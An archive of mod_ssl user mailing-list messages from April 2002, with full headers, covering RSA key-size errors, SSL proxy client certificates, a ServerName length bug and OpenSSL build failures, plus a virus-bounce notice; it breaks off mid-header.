Received: from Yznqfnv (gilberto [10.10.0.3])
        by linux1.ecpcontabil.com.br (8.11.1/8.11.1) with SMTP id g3IIm8p01183
        for ; Thu, 18 Apr 2002 15:48:08 -0300
Date: Thu, 18 Apr 2002 15:48:08 -0300
Message-Id: <200204181848.g3IIm8p01183@linux1.ecpcontabil.com.br>
From: modssl-users 
To: apache@apache.org
Subject: A very  humour game
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary=J4JcQNsg0277gz
X-AntiVirus: scanned for viruses by AMaViS 0.2.1 (http://amavis.org/)
X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N



In article <20020418185518.33397.qmail@apache.org> you wrote:
> Message sent from 
> infected by virus and has not been delivered.
> Viruses:
> infected with Win32.HLLM.Klez.4

> Original message was stored in the archive.
> To receive original message please contact postmaster:
> postmaster@tumko.org

> Archive record: archive.msg.69ZZlC
>       Antivirus service provided by Dr.Web Daemon (www.sald.com)

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 19 09:28:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA11468; Fri, 19 Apr 2002 09:26:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA11358; Fri, 19 Apr 2002 09:25:54 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C956D4CE748; Fri, 19 Apr 2002 09:25:52 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3J59ha47637; Fri, 19 Apr 2002 07:09:43 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.clearflow.com id WAA16460; Thu, 18 Apr 2002 22:05:40 +0200 (MET DST)
Received: from burnerpc ([142.166.168.136])
        by mail.clearflow.com (MERAK 3.00.140) with ESMTP id 6345A2E0
        for ; Thu, 18 Apr 2002 17:21:06 -0300
Date: Thu, 18 Apr 2002 17:05:54 -0300
From: Robert Durdle 
X-Mailer: The Bat! (v1.53d) UNREG / CD5BF9353B3B7091
Organization: Infiknowledge.com
X-Priority: 3 (Normal)
Message-ID: <19821750615.20020418170554@clearflow.com>
To: modssl-users@modssl.org
Subject: 128 bit key
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Durdle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,


I need to create a 128 bit key, but when I try to, it throws this at
me.

11663:error:04075070:rsa routines:RSA_sign:digest too big for rsa key:rsa_sign.c:114:
11663:error:0D072006:asn1 encoding routines:ASN1_sign:bad get asn1 object call:a_sign.c:129:


I need it to create a 128 bit key due to an employers special
needs, a 1024 bit one would be useless to me :/


- Robert                            
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 19 15:20:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA15489; Fri, 19 Apr 2002 15:19:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web12705.mail.yahoo.com id PAA15423; Fri, 19 Apr 2002 15:18:36 +0200 (MET DST)
Message-ID: <20020419131834.80383.qmail@web12705.mail.yahoo.com>
Received: from [156.153.255.243] by web12705.mail.yahoo.com via HTTP; Fri, 19 Apr 2002 06:18:34 PDT
Date: Fri, 19 Apr 2002 06:18:34 -0700 (PDT)
From: Anbuchezhian Chelliah 
Subject: Passing proxy client certificate
To: modssl-users@modssl.org
In-Reply-To: <19821750615.20020418170554@clearflow.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Anbuchezhian Chelliah 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello All,
  I am trying to make a proxy server(apache 1.3.22
compiled after enabling SSL_EXPERIMENTAL) authenticate
itself to a backend server(apache 1.3.19) which is in
the same machine (although in a real scenario the
backend server will run on a different machine).
 
   Proxyserver listens at port 6666 on a machine and
the backend server listnes at 127.0.0.2:8443. All the
communications are SSL-enabled.
 browser ->---SSL + client auth--> Proxy server
--SSL-->backend server.
  Browser authenticates itself to the proxy server
whereas proxy server does not authenticate itself to
the backend server.
   
 Now, the need is to make the proxy server also
authenticate itself to the backend server. 
 The proxy server has  the directive
"SSLProxyMachineCertficateFile" in it's httpd.conf.
This directive has the value set to the its'(proxy's)
client certificate. 
 Should I need to set the value for  
SSLProxyCACertficateFile also?
 
The error I see in the browser is:
        ------------------
     The proxy server received an invalid response
from an upstream server.

The proxy server could not handle the request GET /.

Reason: SSL proxy connect failed (test:6666): peer
127.0.0.1:8443: key values mismatch
        -------------------


Can anyone please throw light on this ?

Thanks a lot in advance.

Thanks and Regards,
Anbu


__________________________________________________
Do You Yahoo!?
Yahoo! Tax Center - online filing with TurboTax
http://taxes.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 19 15:26:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA16097; Fri, 19 Apr 2002 15:25:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from flatwan.net id PAA16048; Fri, 19 Apr 2002 15:24:36 +0200 (MET DST)
Received: from flatwan.net (bigj@flatwan.net [208.235.160.85])
	by flatwan.net (8.12.2/8.12.2) with ESMTP id g3JDNjWn019848
	for ; Fri, 19 Apr 2002 06:23:45 -0700 (MST)
Date: Fri, 19 Apr 2002 06:23:44 -0700 (MST)
From: Jon 
To: modssl-users@modssl.org
Subject: Re: 128 bit key
In-Reply-To: <19821750615.20020418170554@clearflow.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jon 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>From what I'm reading, a 128 bit key is too small so it's complaining. I
think it wants a minimum of 1028.

Do a 'google' on this string 'routines:RSA_sign:digest too big for rsa'.
some of the links are dead so click on the 'cached' version to read the
page.


Jon


On Thu, 18 Apr 2002, Robert Durdle wrote:

> Hi,
>
>
> I need to create a 128 bit key, but when I try to, it throws this at
> me.
>
> 11663:error:04075070:rsa routines:RSA_sign:digest too big for rsa key:rsa_sign.c:114:
> 11663:error:0D072006:asn1 encoding routines:ASN1_sign:bad get asn1 object call:a_sign.c:129:
>
>
> I need it to create a 128 bit key due to an employers special
> needs, a 1024 bit one would be useless to me :/
>
>
> - Robert
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 19 15:46:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA18012; Fri, 19 Apr 2002 15:45:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id PAA17886; Fri, 19 Apr 2002 15:44:06 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g3JDhgv23231
	for ; Fri, 19 Apr 2002 13:43:48 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id <20SCJY24>; Fri, 19 Apr 2002 14:43:39 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02066F67@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: 128 bit key
Date: Fri, 19 Apr 2002 14:43:35 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

When you say you need to create a 128bit key, what are you referring to? I
believe you are confusing the 128bit (or less if your browser is an old
export-crippled one) generated SSL key per SSL session with the actual
server key. Anything less than a 1024 bit server key is a waste of time,
given that 512bit keys are now breakable via desktop machines. Allegedly the
US Government has the power to break 1024 bit keys. There's been a lot of
discussion about this on Bugtraq recently.

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute for the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

The teaching of evolution as a proven fact rather than a theory has done
more harm to scientific progress than anything else in history.


-----Original Message-----
From: Robert Durdle [mailto:durdle@clearflow.com]
Sent: 18 April 2002 21:06
To: modssl-users@modssl.org
Subject: 128 bit key


Hi,


I need to create a 128 bit key, but when I try to, it throws this at
me.

11663:error:04075070:rsa routines:RSA_sign:digest too big for rsa
key:rsa_sign.c:114:
11663:error:0D072006:asn1 encoding routines:ASN1_sign:bad get asn1 object
call:a_sign.c:129:


I need it to create a 128 bit key due to an employers special
needs, a 1024 bit one would be useless to me :/


- Robert                            
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 19 16:17:57 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA00487; Fri, 19 Apr 2002 16:17:03 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ewok.sytrix.com id QAA00477; Fri, 19 Apr 2002 16:16:52 +0200 (MET DST)
Received: from 226.balt.vasco.com (gateway.vasco.com [209.140.121.226])
	by ewok.sytrix.com (8.11.6/8.11.6) with SMTP id g3JDMQP01446
	for ; Fri, 19 Apr 2002 09:22:26 -0400
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [209.140.121.242]) with SMTP; 19 Apr 2002 14:16:51 UT
Date: Fri, 19 Apr 2002 10:14:45 -0400
MIME-Version: 1.0
Subject: BaseAddr.ref for Win32
Message-ID: <3CBFEE15.14191.1078AFED@localhost>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Is there a reason that mod_ssl doesn't set it's base address as a win32 
module for 1.3.24?
This can result in module relocation if the symbols in mod_ssl and libeay are 
both set to the default address (10000000), which can then result in apache 
coring, and never starting up.
I noticed that for apache 2, this is in fact set (mod_ssl              0x6FD00000  
  0x00070000), so it makes sense that the patch program should path 
BaseAddr.ref along with the other files it patches.
Aryeh
---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 19 20:23:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA12347; Fri, 19 Apr 2002 20:22:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA12249; Fri, 19 Apr 2002 20:20:55 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id DF0B24CE744; Fri, 19 Apr 2002 20:20:51 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3JIH7I61303; Fri, 19 Apr 2002 20:17:07 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id SAA08370; Fri, 19 Apr 2002 18:56:15 +0200 (MET DST)
Date: Fri, 19 Apr 2002 18:56:15 +0200 (MET DST)
Message-Id: <200204191656.SAA08370@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] mod_ssl long hostnames still broken??? (PR#696)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Bernard L du Breuil
Version: 2.8
OS: Solaris 8
Submission from: (NULL) (192.48.242.3)


This is the version that is coming packaged with Apache 2.0.35.

My server would start but then not work when the user tried to connect.  I went
so far as to translate the error codes 

SSL_F_SSL_SET_SESSION_ID_CONTEXT               218
SSL_R_SSL_SESSION_ID_CONTEXT_TOO_LONG          273

which seems to mean that it had trouble setting the session id context because
it was too long.  I noticed from the other apache/mod_ssl error messages below
that ServerName seemed to be the source of the problem.  I experimented by
shortening ServerName and sure enough the server started working but with other
error messages about the certificate not matching ServerName.

I must confess that there was this bug report 300 from 1999 that clued me in. 

http://www.modssl.org/support/bugdb/index.cgi/open?id=330;expression=context;user=guest

It looked kind of like the problem was being fixed in version 2.4 but it doesn't
seem to be fixed in 2.8.

Please tell me what the status is on this 'feature'?  Do I need to shorten my
server names to use mod_ssl?  Can I/Should I build openssl with a bigger limit? 
Can I tell mod_ssl to ignore part of the servername when it sets the context
since every Virtual Host I set up ends with usace.army.mil?  Is there a patch to
mod_ssl for this problem?

Thanks!
Bernie

Apache ssl engine log:


[17/Apr/2002 13:22:56 09045] [info]  Init: Initializing OpenSSL library
[17/Apr/2002 13:22:56 09045] [info]  Init: Seeding PRNG with 512 bytes of
entropy
[17/Apr/2002 13:22:56 09045] [info]  Init: (microlith.crrel.usace.army.mil:444)
Loading certificate & private key of SSL-aware server
[17/Apr/2002 13:22:56 09045] [info]  Init: Generating temporary RSA private keys
(512/1024 bits)
[17/Apr/2002 13:22:58 09045] [info]  Init: Generating temporary DH parameters
(512/1024 bits)
[17/Apr/2002 13:22:58 09045] [info]  Init: Initializing (virtual) servers for
SSL
[17/Apr/2002 13:22:58 09045] [info]  Init: (microlith.crrel.usace.army.mil:444)
Configuring server for SSL protocol
[17/Apr/2002 13:22:58 09045] [info]  Server: Apache/2.0.35, Interface:
mod_ssl/2.0.35, Library: OpenSSL/0.9.6c
[17/Apr/2002 13:22:58 09047] [info]  Init: Initializing OpenSSL library
[17/Apr/2002 13:22:58 09047] [info]  Init: Seeding PRNG with 512 bytes of
entropy
[17/Apr/2002 13:22:58 09047] [info]  Init: (microlith.crrel.usace.army.mil:444)
Loading certificate & private key of SSL-aware server
[17/Apr/2002 13:22:58 09047] [info]  Init: Generating temporary RSA private keys
(512/1024 bits)
[17/Apr/2002 13:23:00 09047] [info]  Init: Generating temporary DH parameters
(512/1024 bits)
[17/Apr/2002 13:23:00 09047] [info]  Init: Initializing (virtual) servers for
SSL
[17/Apr/2002 13:23:01 09047] [info]  Init: (microlith.crrel.usace.army.mil:444)
Configuring server for SSL protocol
[17/Apr/2002 13:23:01 09047] [info]  Server: Apache/2.0.35, Interface:
mod_ssl/2.0.35, Library: OpenSSL/0.9.6c
[17/Apr/2002 13:23:03 09075] [info]  Connection to child 0 established (server
microlith.crrel.usace.army.mil:444, client 144.3.100.96)
[17/Apr/2002 13:23:03 09075] [info]  Seeding PRNG with 512 bytes of entropy
[17/Apr/2002 13:23:03 09075] [error] Unable to set session id context to
`microlith.crrel.usace.army.mil:444' (OpenSSL library error follo
ws)
[17/Apr/2002 13:23:03 09075] [error] OpenSSL:
error:140DA111:lib(20):func(218):reason(273)

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 20 07:14:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA10420; Sat, 20 Apr 2002 07:13:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from omta04.mta.everyone.net id HAA10414; Sat, 20 Apr 2002 07:12:59 +0200 (MET DST)
Received: from sitemail.everyone.net (dsnat [216.200.145.62])
	by omta04.mta.everyone.net (Postfix) with ESMTP
	id 9EAF54F5A9; Fri, 19 Apr 2002 22:12:57 -0700 (PDT)
Received: by sitemail.everyone.net (Postfix, from userid 99)
	id 4FC7D36FA; Fri, 19 Apr 2002 22:12:57 -0700 (PDT)
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0
X-Mailer: MIME-tools 5.41 (Entity 5.404)
Date: Fri, 19 Apr 2002 22:12:56 -0700 (PDT)
From: Nisarg Rav 
To: modssl-users@modssl.org, Nisarg Rav 
Cc: modssl-users@modssl.org
Subject: Re: Urgent help needed Regarding installation of openssl-0.9.6b
    on Redhat linux 7.1
X-Originating-Ip: [203.88.129.229]
Message-Id: <20020420051257.4FC7D36FA@sitemail.everyone.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nisarg Rav 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello friends ,, 
Right now i'm facing one problem while installing openssl. Here is what i did. 

I've redhat linux 7.1 installed and openssl-0.9.6 was already installed on it. I was not willing to use that installedm, but i want to install trom tar.gz in /usr/local, so i did 

1. rpm -e openssl 
At this time it gave me no of dependencies problem due to which it was unable to uninstall it. 

2. then i executed 
rpm -e openssl --nodeps 
This time it removed openssl only, But then after when i'm trying to install by untaring openssl-0.9.6b.tar.gz it is giving following error .. 

I had also updated gcc, cpp and gcc-cpp complier ..
________________________ 
Operating system: i686-whatever-linux2 
Configuring for linux-elf 
Configuring for linux-elf 
IsWindows=0 
CC =gcc 
CFLAG =-fPIC -DTHREADS -D_REENTRANT -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDIAN -DTERMIO -O3 -fomit-frame-pointer -m486 -Wall -DSHA1_ASM -DMD5_ASM -DRMD160_ASM 
EX_LIBS =-ldl 
BN_ASM =asm/bn86-elf.o asm/co86-elf.o 
DES_ENC =asm/dx86-elf.o asm/yx86-elf.o 
BF_ENC =asm/bx86-elf.o 
CAST_ENC =asm/cx86-elf.o 
RC4_ENC =asm/rx86-elf.o 
RC5_ENC =asm/r586-elf.o 
MD5_OBJ_ASM =asm/mx86-elf.o 
SHA1_OBJ_ASM =asm/sx86-elf.o 
RMD160_OBJ_ASM=asm/rm86-elf.o 
PROCESSOR = 
RANLIB =/usr/bin/ranlib 
PERL =/usr/bin/perl 
THIRTY_TWO_BIT mode 
DES_PTR used 
DES_RISC1 used 
DES_UNROLL used 
BN_LLONG mode 
RC4_INDEX mode 
RC4_CHUNK is undefined 
Makefile => Makefile.ssl 
e_os.h => include/openssl/e_os.h [File exists] 
e_os2.h => include/openssl/e_os2.h [File exists] 
making links in crypto... 
make[1]: Entering directory `/usr/local/openssl-0.9.6b/crypto' 
Makefile => Makefile.ssl 
crypto.h => ../include/openssl/crypto.h [File exists] 
tmdiff.h => ../include/openssl/tmdiff.h [File exists] 
opensslv.h => ../include/openssl/opensslv.h [File exists] 
..... 

and while doing make it is giving following error.. 

gcc -I.. -I../../include -fPIC -DTHREADS -D_REENTRANT -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDIAN -DTERMIO -O3 -fomit-frame-pointer -m486 -Wall -DSHA1_ASM -DMD5_ASM -DRMD160_ASM -c -o dsa_ossl.o dsa_ossl.c 
In file included from dsa_ossl.c:62: 
../cryptlib.h:65: Internal error: Segmentation fault. 
Please submit a full bug report. 
See  for instructions. 
make[2]: *** [dsa_ossl.o] Error 1 
make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/dsa' 
make[1]: *** [subdirs] Error 1 
make[1]: Leaving directory `/usr/local/openssl-0.9.6b/crypto' 
make: *** [sub_all] Error 1 

Please help me for solving this problem .. 
It is very important for me to resolve it sooner.. 

Thanks in advance .. 
nisarg 



--- Joe Orton  wrote:
>On Thu, Apr 18, 2002 at 06:06:07AM -0700, Nisarg Rav wrote:
>> Hello gurus ,
>> 
>> I'm facing one typical problem while configuring openssl-0.9.6b on 
>> RedHat linux 7.1 , kernel 2.4.2-2.
>
>Try upgrading your compiler:
>
>http://www.redhat.com/support/errata/RHBA-2001-082.html
>
>joe
>
>> ../cryptlib.h:65: Internal error: Segmentation fault.
>> Please submit a full bug report.
>> See  for instructions.
>> make[2]: *** [a_octet.o] Error 1
>> make[2]: Leaving directory `/usr/local/openssl-0.9.6b/crypto/asn1'
>> make[1]: *** [subdirs] Error 1
>> make[1]: Leaving directory `/usr/local/openssl-0.9.6b/crypto'
>> make: *** [sub_all] Error 1
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

_____________________________________________________________
Want a new web-based email account ? ---> http://www.firstlinux.net

_____________________________________________________________
Run a small business? Then you need professional email like you@yourbiz.com from Everyone.net  http://www.everyone.net?tag
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 20 12:14:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA21416; Sat, 20 Apr 2002 12:13:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA21374; Sat, 20 Apr 2002 12:12:22 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 019674CE618; Sat, 20 Apr 2002 12:12:21 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3K7RKd75729; Sat, 20 Apr 2002 09:27:20 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web11301.mail.yahoo.com id JAA14229; Sat, 20 Apr 2002 09:16:45 +0200 (MET DST)
Message-ID: <20020420071644.14379.qmail@web11301.mail.yahoo.com>
Received: from [202.60.128.249] by web11301.mail.yahoo.com via HTTP; Sat, 20 Apr 2002 00:16:44 PDT
Date: Sat, 20 Apr 2002 00:16:44 -0700 (PDT)
From: Sonu Kishore 
Subject: Urgent help
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sonu Kishore 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I want to use apache 2.0 how do I configure it with mod_ssl & openssl.

Please guide its very very urgent.
Reply at
sonu@rolta.com
sonu_kishore@yahoo.com

Regards
sonu

__________________________________________________
Do You Yahoo!?
Yahoo! Games - play chess, backgammon, pool and more
http://games.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 20 15:03:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA28357; Sat, 20 Apr 2002 15:02:46 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns1.microanswers.net id PAA28300; Sat, 20 Apr 2002 15:01:17 +0200 (MET DST)
Received: from ws1 (microanswers.net [63.230.56.77] (may be forged))
	by ns1.microanswers.net (8.11.0/8.11.0) with SMTP id g3KCjNC20564
	for ; Sat, 20 Apr 2002 07:45:23 -0500
Message-ID: <008c01c1e86a$2054f2a0$4d38e63f@microanswers.net>
From: "Andrew Lietzow" 
To: 
References: <20020420071644.14379.qmail@web11301.mail.yahoo.com>
Subject: Re: Urgent help
Date: Sat, 20 Apr 2002 07:51:44 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-Mimeole: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andrew Lietzow" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Dear Sonu,
RE:>>> I want to use apache 2.0 how do I configure it with mod_ssl &
openssl.
AND
RE:>>Please guide its very very urgent.

Sorry to be the bearer of bad news, but it seems everyone who is in such a
hurry frequently fails to do the most essential of things which are critical
to their near term and long term success.  This is a basic step which they
probably already know but want to believe it to be otherwise.

If you MUST start this endeavor, and it appears from your urgency that this
is
not an optional activity, then instead of going to the golf course, or
enjoying time by the
pool; or being with your family or friends and enjoying ESPN, or whatever
else you could be doing, then, at least take the time to do your homework.

Should you charge ahead without being somewhat cognizant of the complexity
of
it all, your experience will be encumbered by significant frustration and
you will either
end up badmouthing the product, your operating system, the people on this
list, or
whomever; when all of that could have easily been avoided by taking this one
simple step.  RTFM.

I want to give you the absolute best advice of which I am cognizant, Sonu.
You may
think I'm being smart, arrogant, or simply rude, but I am going to pass on
to you
what some bright fellow from England recommended to me when "I" first wanted
to install this package.

And, it is a very important acronym to know if you are going to be
successful in
your endeavor.  RTFM.  "Read The Friendly Manual"...

This is not your son's tricycle that you are going to be putting together.
You might get away
with skipping the directions when you decide to put minor projects together
without
taking the time to read the directions.  However, IMO, this step CANNOT be
avoided if you
desire to attain success with your project.

With that said, you can go the the Apache or modssl.org web site and pick up
VOLUMES of information--for free!--helpful hints that will quickly get you
on your way.
Or, you can do like I did and immediately invest in at least one
comprehensive text on the
subject.   I know there are several very excellent texts out there and some
may have
been written by others on this very list.  I invested in one from Wrox Press
called
"Professional Apache" by Peter Wainwright.  Again, there are several other
excellent treatises on this subject and any of these will aid you IMMENSELY
in your
undertaking.  These people have gone before you, to pave the way and relieve
you of
untold hours, days, or even weeks of frustration and anquish.  The road is
now clear
and it is mostly smooth sailing, but you must have the roadmap if you are
going to
start the journey.

So, Sonu, if it is indeed true that you need this in a "very very urgent"
manner, then I would
recommend that you do this ASAP.    Spend the little bit of money and take
the
few hours required to AT LEAST read the basics for installation.  If you
don't want
to spend the money, then you can study at numerous places on the web.  In
very short order, you can have your system up and running!--but you must
start at the
beginning.   IF YOU CHOOSE NOT TO DO THIS, IMO, you'll be coming to this
list all
of the time, screaming "FIRE, FIRE", when in reality, there is no fire.
There is only an
illusion of fire, easily put out with your very own fire extinguisher--your
mind.

If you are not willing to start at the beginning then you might as well go
play some
golf and let someone else relieve you of the frustration you are about to
experience...
IMHO...

Sincerely,

Andrew Lietzow
The ACL Group, Inc.
>

----- Original Message -----
From: "Sonu Kishore" 
To: 
Sent: Saturday, April 20, 2002 2:16 AM
Subject: Urgent help


> Please guide its very very urgent.
> Reply at
> sonu@rolta.com
> sonu_kishore@yahoo.com
>
> Regards
> sonu
>
> __________________________________________________
> Do You Yahoo!?
> Yahoo! Games - play chess, backgammon, pool and more
> http://games.yahoo.com/
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 20 15:18:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA29210; Sat, 20 Apr 2002 15:17:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id PAA29196; Sat, 20 Apr 2002 15:16:48 +0200 (MET DST)
